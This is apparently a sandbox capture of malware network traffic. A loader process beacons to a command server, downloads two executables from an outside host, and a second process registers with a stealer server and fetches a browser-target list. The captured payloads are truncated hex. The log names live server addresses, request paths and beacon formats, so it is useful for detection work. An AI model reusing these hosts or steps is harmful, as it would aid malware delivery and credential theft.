Dec 14, 2024 12:56:15.940612078 CET	1236	IN	Data Raw: 33 c9 83 fe 2b 0f 94 c1 8b 44 88 08 66 83 78 08 47 75 42 8d 41 03 89 45 f8 8d 45 fc 53 50 8d 45 e8 50 8d 45 f8 50 57 e8 1b 44 00 00 85 c0 0f 88 a2 06 04 00 8d 4d e8 e8 6e 77 00 00 8b 55 fc e9 25 ff ff ff b9 6c 15 4d 00 e8 63 08 00 00 33 c0 5f 5e Data Ascii: 3+DfxGuBAEESPEPEPWDMnwU%lMc3_^[jiXlU<SVMMW}3E7Nuu3RB3t&u"@f9putBuu6UMEPdEM@M_^[I
Dec 14, 2024 12:56:15.940622091 CET	1236	IN	Data Raw: 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8 f9 01 00 00 8d 4d a8 e8 f1 01 00 00 8d 8d 54 ff ff ff e8 e6 01 00 00 8d 4d 9c e8 de 01 00 00 5f 8b c6 5e 5b c9 c3 83 e8 04 0f 84 ca 03 04 00 83 e8 01 0f 84 Data Ascii: xl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG\|EIEE}`PGdE%}U]
Dec 14, 2024 12:56:15.940648079 CET	1236	IN	Data Raw: 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00 68 18 14 4d 00 8b ce e8 2c 03 00 00 84 c0 0f 84 b1 00 04 00 a0 90 23 4d 00 a2 04 14 4d 00 a0 91 23 4d 00 88 44 24 12 8d 44 24 14 50 8d 84 24 3c 00 01 00 50 Data Ascii: 3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa\|$sY4=MMuW0M=MuD$8PIL$(m_^[]
Dec 14, 2024 12:56:15.940918922 CET	1236	IN	Data Raw: 03 00 57 68 30 ca 49 00 e8 ba 1a 02 00 59 59 85 c0 0f 84 92 fd 03 00 57 68 08 ca 49 00 e8 a5 1a 02 00 59 59 85 c0 0f 84 99 fd 03 00 57 68 dc c9 49 00 e8 90 1a 02 00 59 59 85 c0 75 3e 89 1d 00 14 4d 00 38 5d 0b 75 0a c7 05 00 14 4d 00 03 00 00 00 Data Ascii: Wh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@Mt~5EPML?CESjPWf@MK
Dec 14, 2024 12:56:15.940944910 CET	1236	IN	Data Raw: 04 83 c4 0c 8b 06 33 d2 8b 4e 04 5f 66 89 14 48 8b c6 5e 5b 5d c2 08 00 55 8b ec 83 e4 f8 b8 3c 00 01 00 e8 f3 ea 03 00 8b 45 08 8d 4c 24 1c 53 33 db a3 94 23 4d 00 56 b8 34 cc 49 00 66 89 1d 90 23 4d 00 57 88 1d 92 23 4d 00 89 1d 98 23 4d 00 89 Data Ascii: 3N_fH^[]U<EL$S3#MV4If#MW#M#M#M#M#M#M#M#M#M#MDI#M#M#M#M#M#M#M#M#M<I#M#M#M#MfNtL$(>T$(0h
Dec 14, 2024 12:56:16.060741901 CET	1236	IN	Data Raw: 15 d0 c4 49 00 c6 05 68 13 4d 00 01 8b ce e8 07 00 00 00 5f 5e 5b 8b e5 5d c3 55 8b ec 83 e4 f8 81 ec cc 04 00 00 80 3d 68 13 4d 00 00 56 8b f1 0f 84 d4 00 00 00 68 04 01 00 00 8d 4c 24 0c e8 23 29 00 00 80 3d 67 13 4d 00 01 0f 84 39 fa 03 00 33 Data Ascii: IhM_^[]U=hMVhL$#)=gM93fD$D$PL$1=eMM~`'hML$)$(VjPML$$T$$3F$$ h$(2YD$P$4PYY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49794	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:20.200715065 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015166001&unit=246122658369
Dec 14, 2024 12:56:21.551240921 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49796	185.215.113.16	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:21.683790922 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 14, 2024 12:56:23.014734983 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:22 GMT Content-Type: application/octet-stream Content-Length: 1806336 Last-Modified: Sat, 14 Dec 2024 10:56:44 GMT Connection: keep-alive ETag: "675d646c-1b9000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 10 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 69 00 00 04 00 00 42 f5 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTgi@@iB@M$a$$ $h@.rsrc$x@.idata $z@ P$\|@vknblbixO~@fyoegluiij@.taggant0i"n@
Dec 14, 2024 12:56:23.014760017 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:23.014775991 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:23.014807940 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:23.014823914 CET	1236	IN	Data Raw: 98 14 d6 c1 5a cc fb 24 9c bf 3a be 88 97 97 83 d7 b3 63 1d 5b 8f a0 4d f3 97 db 5e f7 13 d3 12 cb 4d cb 3b db 25 c3 83 86 c9 b4 ff bb 75 99 31 a3 77 b3 3d 9f e7 a3 71 87 97 8f d4 30 86 8b e4 96 9b 77 d5 de 11 d3 3d 9a 9f 9f 55 ef b7 63 3c dd 76 Data Ascii: Z$:c[M^M;%u1w=q0w=Uc<vzF'IbC?=rrc^\7&#8,[PweZcaOB^\YzY@aGW4W[1mggN]$j0`8a\Uj
Dec 14, 2024 12:56:23.014839888 CET	1236	IN	Data Raw: cd 6f 99 f9 f7 67 cf 24 98 96 e4 50 73 aa 2e cd ab af 17 f5 c8 77 6c 4c 12 70 7c a9 c7 87 08 ed 6d ed 62 ee ce f0 38 8e be c4 7b bb 02 c8 63 81 f6 04 62 92 2f a8 fc 8d d2 2c 61 43 aa 95 a9 ca 0e be 96 9d 4e e0 62 5e a7 e6 99 b2 86 f7 63 c0 47 90 Data Ascii: og$Ps.wlLp\|mb8{cb/,aCNb^cGJQYDRo>{SB)+}3cEkE:9+PLlw*o~s!x7 7>4$ROK\Mid73owna
Dec 14, 2024 12:56:23.014858007 CET	1236	IN	Data Raw: 99 bc cb c1 cc 0f 7a 95 4e 7d 61 34 c8 ae 1a 44 cd 33 6a bd 97 de 53 39 89 cd 13 35 1b 97 77 a5 7e 6d 6e 9f 0f bf 2b 30 03 13 7d 3d 53 d2 1f 7d d5 79 e1 3c cf af e7 11 a8 83 0c 39 39 53 73 25 91 b7 69 31 63 de 83 b8 cc 55 b3 1d cd 7f ab c1 f2 16 Data Ascii: zN}a4D3jS95w~mn+0}=S}y<99Ss%i1cUgugWgkuTL@;}Y\Q^$/=b{wi^cZ7cD5sj"&xM#~)o#<&b-x1/71)O'l[+5
Dec 14, 2024 12:56:23.015079975 CET	1236	IN	Data Raw: cf a4 69 18 79 bb 43 ca 4f 30 63 39 7a 10 3f 8c 87 81 6b 61 4f fe a3 40 d0 df 63 2f 57 d2 bb 4d b5 e4 fa be c6 7e 9b 3c 7b 13 9d 31 f0 ed ca 31 5f 81 7a 09 cf 87 e4 b5 92 03 c2 2d 37 81 9d d9 c7 1f de 2c ed c4 63 3d f4 0a 83 63 87 c3 ca 25 7b cd Data Ascii: iyCO0c9z?kaO@c/WM~<{11_z-7,c=c%{uebEj5G3,U4s~3@Rlg//k/Q8W/7Obg/v9\|4Jr${ie["VswKh5Cz}n%j-#=
Dec 14, 2024 12:56:23.015096903 CET	1236	IN	Data Raw: 3b 96 1a c8 c8 c2 6a 31 9b 39 57 2f c7 ab 97 a9 4e d7 90 8b 0e 97 83 19 4b a3 69 24 7b 82 82 be 50 cf 69 35 87 13 33 c9 8e 7c a2 40 ab ef 6e 2f 78 97 6f cb 50 6a 65 be 0f 12 c0 55 d1 86 d3 7a 77 86 96 e1 c8 0a db c0 cc 17 a3 26 53 03 21 30 4f ff Data Ascii: ;j19W/NKi${Pi53\|@n/xoPjeUzw&S!0Oz_l/iZK-.iSR)A}[$F!iT'i2jcwVu 34iAwN.iO[iQMSc
Dec 14, 2024 12:56:23.015113115 CET	1236	IN	Data Raw: aa 81 6b c1 5a 6b e4 80 dd 8d f8 57 ef 03 72 83 43 7e cf cb c8 7a 5a 13 d5 33 d7 2f 67 ad 53 c4 f5 40 5a bc 12 2b 9a 34 b7 1a 57 bf ed 82 69 ed 17 8e 8d 85 0b 13 7f f9 f8 c3 d6 83 72 ad 69 e1 c7 7b 63 ed 77 cd e6 4d ca ff 03 c6 cc 97 9e cd fa 1a Data Ascii: kZkWrC~zZ3/gS@Z+4Wiri{cwMV83r)MS#AW}Z"=F\|k=0wa}D/i=PS,gi1C-ksgK/GGN#}1TESKrc#Oo7CV
Dec 14, 2024 12:56:23.135415077 CET	1236	IN	Data Raw: f6 95 b9 ee 34 c6 74 7d c3 3d e1 72 91 c7 e3 88 88 23 9f 37 f3 c1 28 e8 50 b9 70 01 4c a1 7d 71 d4 88 67 6f 54 79 7a 46 9c e1 8a 17 35 41 a0 e7 c7 5e 7b 0b 7f 89 b7 f5 86 01 7a 21 cc 12 6f cd e2 73 07 74 55 ce 23 9a ce 30 26 82 6b b5 b7 bd 2a 96 Data Ascii: 4t}=r#7(PpL}qgoTyzF5A^{z!ostU#0&k*M6tTol,qkx5GKN\|s?FO7'HsZQ yd4F.#t\ZM#AklC SvJG;>d9B#M_[,6p[gtq oO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49823	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:28.692976952 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015167001&unit=246122658369
Dec 14, 2024 12:56:30.042119026 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49827	185.215.113.16	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:30.190109015 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 14, 2024 12:56:31.517569065 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:30 GMT Content-Type: application/octet-stream Content-Length: 2794496 Last-Modified: Sat, 14 Dec 2024 10:55:53 GMT Connection: keep-alive ETag: "675d6439-2aa400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 c6 4d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `+M+`Ui` @ @.rsrc`2@.idata 8@titmuczc`D:@zslsucpn +~@.taggant@ +"@
Dec 14, 2024 12:56:31.517620087 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:31.517662048 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:31.517698050 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:31.517735004 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:31.517769098 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:31.517823935 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:31.517858982 CET	1236	IN	Data Raw: 9d 7c 77 b0 75 d9 78 75 fe c8 76 ed ee fe d3 9f 9a 15 de 8f 5b b3 ca 4f 2a 8e ac 6e c4 13 3d 85 56 00 23 14 c0 f1 fd cf a6 49 b4 a5 cf b7 68 70 0b 8f 98 9f 47 82 6b 6b fd b1 75 69 0d 87 2f 82 0f 7a 88 af 75 85 84 c7 59 9e 97 65 eb 98 75 00 38 61 Data Ascii: \|wuxuv[O*n=V#IhpGkkui/zuYeu8aoe1orze}mq\|~}ssWHBNIsl!l=smz,KVqRj$u{}z,p~9ql\|Bo~)\Pyzz2-A=
Dec 14, 2024 12:56:31.517894983 CET	1236	IN	Data Raw: 89 7d 8e c5 b1 7d 92 91 9a 68 17 a6 f4 a0 8c 1e 3c a8 88 a9 6d b3 aa 8e 2b 05 b3 b5 11 c0 82 b0 3b a8 c2 8f 9d e0 c6 b2 a2 73 04 2e 12 7d ce af 3b dc 8e dd 6d c4 de a3 5f 19 e9 e9 39 a0 ea 86 6b a1 22 0a f5 fc 7b 37 12 00 9b b0 7b 91 02 fe 83 38 Data Ascii: }}h<m+;s.};m_9k"{7{8}S$F,-49w=SxE<FJTKesiRoZ#bo\|-rwN#x/K}tJtGR[Zt$4tlppvp}
Dec 14, 2024 12:56:31.517934084 CET	1236	IN	Data Raw: 52 9a 87 b6 67 b8 8e 82 4e e5 3e b0 06 64 7e 24 01 73 90 dd 41 8d b2 56 f6 d6 bd ce 60 58 e4 53 58 a5 bc e0 ff f9 b0 74 8c d7 63 83 1b 92 c3 46 4c 80 e2 bf f1 e3 ff d1 0b 70 ec d1 5c d3 de 0a 84 8d da 9e 0d d7 d2 b8 02 4a 23 b1 79 2d a8 01 bf 66 Data Ascii: RgN>d~$sAV`XSXtcFLp\J#y-f)IO[<\|r:sv{MLExw%V`bS{[4&&z_)@\|l.]T2`nI$f}]Yy>Nr(:\|6\;uH1(
Dec 14, 2024 12:56:31.637933969 CET	1236	IN	Data Raw: fa c5 57 5a 24 94 6d 89 1f 18 74 74 d8 74 b0 90 ef 8d 7c f0 ef 94 ce 7d ec aa 5a d6 f2 85 59 a1 ef 84 d4 bb 3c 91 20 43 6f 59 6a e7 50 43 8c 1e 3b 3e e7 b4 52 e2 96 6d 3b 72 80 c4 59 d1 da bb e9 df d8 b2 5f d3 cf 5e bc 9d 79 40 ac e7 dd f2 5b 58 Data Ascii: WZ$mttt\|}ZY< CoYjPC;>Rm;rY_^y@[XF{t%}\|o/dJ-7Fo)zqlq@\*fe~~Fa[$}S@2]AOS}EyeKQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49834	185.215.113.206	80	6828	C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:31.607851982 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 12:56:32.959790945 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:56:32.962894917 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="build"stok------GDBFBFCBFBKECAAKJKFB--
Dec 14, 2024 12:56:33.422545910 CET	407	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 6a 6b 7a 4d 57 51 34 4d 57 45 34 59 7a 4d 78 4f 47 49 31 4e 44 45 33 59 6a 68 6d 4e 44 51 79 4d 7a 5a 68 4d 7a 67 31 59 54 6c 69 59 54 42 6d 5a 44 63 31 5a 6a 63 35 4f 54 59 34 4f 57 51 30 4d 32 4a 6a 59 57 55 34 4e 57 59 30 4f 54 67 31 5a 47 59 79 4d 7a 51 33 5a 54 45 79 4e 44 41 78 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NjkzMWQ4MWE4YzMxOGI1NDE3YjhmNDQyMzZhMzg1YTliYTBmZDc1Zjc5OTY4OWQ0M2JjYWU4NWY0OTg1ZGYyMzQ3ZTEyNDAxfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 14, 2024 12:56:33.423751116 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJ Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="message"browsers------GCGHIIDHCGHCAAAAAFIJ--
Dec 14, 2024 12:56:33.871177912 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: 